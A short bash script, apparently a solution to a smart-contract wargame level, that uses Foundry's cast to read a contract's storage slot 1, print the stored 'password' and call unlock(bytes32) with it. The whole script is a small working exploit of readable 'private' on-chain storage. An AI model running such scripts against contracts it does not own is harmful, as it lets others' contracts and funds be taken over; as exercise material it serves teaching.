#!/bin/bash

echo checking contract address storage at slot 1
PASSWORD=$(cast storage $CONTRACT_ADDRESS 1)
echo password is: $PASSWORD
echo calling unlock with password
cast send --private-key $PRIVATE_KEY $CONTRACT_ADDRESS 'unlock(bytes32)' $PASSWORD